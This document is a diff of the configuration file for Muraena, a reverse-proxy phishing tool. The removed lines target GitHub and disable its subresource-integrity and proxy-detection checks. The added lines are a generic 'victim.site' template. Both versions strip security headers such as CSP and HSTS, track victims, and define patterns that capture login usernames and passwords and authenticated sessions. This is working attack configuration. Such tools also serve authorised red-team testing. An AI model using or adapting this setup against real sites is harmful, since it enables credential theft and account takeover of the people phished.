--- a/config/config.toml
+++ b/config/config.toml
@@ -1,65 +1,101 @@
 [proxy]
+
 phishing = "test.muraena"
-destination = "github.com"
-skipContentType = [ "font/*", "image/*" ]
-
-[proxy.listener]
-ip = "0.0.0.0"
+destination = "victim.site"
+IP = "0.0.0.0"
 port = 443
-# portmapping = "8443:443"
 
-[proxy.listener.HTTPtoHTTPS]
-enabled = true
-HTTPport = 8080
+#
+# Simple port forwarding used when the phishing site listen on a port different from target domain, such as:
+# - test.muraena:8443
+# - victim.site: 443
+#
+# port mapping can be configured as follow: ListeningPort:TargetPort
+# portmapping = "443:31337"
 
-[proxy.transform.base64]
-enabled = true
-padding = [ "=", "." ]
+    [proxy.HTTPtoHTTPS]
+    enabled = true
+    HTTPport = 80
 
-[proxy.transform.request]
-header = [ "Cookie", "Referer", "Origin", "X-Forwarded-For" ]
 
-[proxy.transform.response]
-header = [
-    "Location",
-    "WWW-Authenticate",
-    "Origin",
-    "Set-Cookie",
-    "Access-Control-Allow-Origin"
-]
-custom = [
-  [ "integrity=\"", "no-integrity=\"" ],
-  [ "js-proxy-site-detection-payload", "" ],
-  [ "expected-hostname", "" ],
-  [ "html-safe-nonce", "" ]
-]
 
-[proxy.remove.request]
-header = [ "X-Forwarded-For" ]
+#
+# Proxy's replacement rules
+#
+[transform]
 
-[proxy.remove.response]
-header = [
-    "Content-Security-Policy",
-    "Content-Security-Policy-Report-Only",
-    "Strict-Transport-Security",
-    "X-XSS-Protection",
-    "X-Content-Type-Options",
-    "X-Frame-Options",
-    "Referrer-Policy",
-    "X-Forwarded-For"
-]
+    skipContentType = [ "font/*", "image/*" ]
 
-[[proxy.drop]]
-url = "/logout"
-redirectTo = "https://example.com"
+    # Enable transformation rules in base64 strings
+    [transform.base64]
+    enabled = false
+    padding = [ "=", "." ]
 
-[proxy.log]
+    [transform.request]
+        headers = [
+            "Cookie",
+            "Referer",
+            "Origin",
+            "X-Forwarded-For"
+        ]
+
+    [transform.response]
+        headers = [
+            "Location",
+            "WWW-Authenticate",
+            "Origin",
+            "Set-Cookie",
+            "Access-Control-Allow-Origin"
+        ]
+
+        # Generic replacement rules:
+        # it applies to body and any http header enabled for manipulation
+        content = [
+          [ "this is blue", "this is green" ]
+        ]
+
+
+#
+# Proxy's wiping rules
+#
+[remove]
+
+    [remove.request]
+        headers = [
+            "X-Forwarded-For"
+        ]
+
+    [remove.response]
+        headers = [
+            "Content-Security-Policy",
+            "Content-Security-Policy-Report-Only",
+            "Strict-Transport-Security",
+            "X-XSS-Protection",
+            "X-Content-Type-Options",
+            "X-Frame-Options",
+            "Referrer-Policy",
+            "X-Forwarded-For"
+        ]
+
+
+#
+# Rudimental redirection rules
+#
+[[drop]]
+path = "/logout"
+redirectTo = "https://victim.site"
+
+
+#
+# LOG
+#
+[log]
 enabled = true
 filePath = "muraena.log"
 
 
 #
-#
+# TLS
 #
 [tls]
 enabled = true
@@ -68,31 +104,21 @@ certificate = "./config/cert.pem"
 key = "./config/privkey.pem"
 root = "./config/fullchain.pem"
 
-
 #
-#
+# CRAWLER
 #
 [crawler]
-enabled = true
-depth = 0
-upto = 5
-externalOriginPrefix = "muraena-"
+enabled = false
+depth = 3
+upto = 20
+externalOriginPrefix = "www-"
 externalOrigins = [
-  "*.githubassets.com",
-  "*.githubusercontent.com",
-  "*.github.io",
-  "*.githubapp.com",
-  "github-cloud.s3.amazonaws.com",
-  "octocaptcha.com",
-  "stats.g.doubleclick.net",
-  "github.community",
-  "githubstatus.com",
-  "githubengineering.com"
+  "*.anotherdomain.site",
+  "example.dev"
 ]
 
-
 #
-#
+# NECROBROWSER
 #
 [necrobrowser]
 enabled = false
@@ -101,7 +127,7 @@ profile = "./config/instrument.necro"
 
 
 #
-#
+# STATIC SERVER
 #
 [staticServer]
 enabled = false
@@ -111,29 +137,47 @@ urlPath = "/evilpath/"
 
 
 #
-# TRACKING MODULE
+# TRACKING
 #
 [tracking]
 enabled = true
-type = ""
+
+# Tracking types can be Path || Query (default)
+#
+# query:
+#  ?identifier=trackingID
+#
+# path:
+#   /trackingID
+#
+type = "query"
+
+# Tracking identifier
 identifier = "_gat"
-domain = ""
-ipSource = ""
+
+# Rule to generate and validate a tracking identifier
 regex = "[a-zA-Z0-9]{5}"
-params = [ "login_email", "login_password" ]
+
+# Set speific victim's IP address
+# ipSource = ""
+
+# Set tracking cookie for a custom domain
+# domain = ""
 
 [tracking.urls]
-credentials = [ "/credentials_path" ]
-authSession = [ "/auth_session_path" ]
+credentials = [ "/session" ]
+authSession = [ "/settings/profile" ]
 
 [[tracking.patterns]]
 label = "Username"
-matching = "login_email"
-start = "login_email="
-end = "&"
+matching = "login"
+start = "login="
+end = "&password="
 
 [[tracking.patterns]]
 label = "Password"
-matching = "login_password"
-start = "&login_password="
+matching = "password"
+start = "password="
 end = "&"
+
+
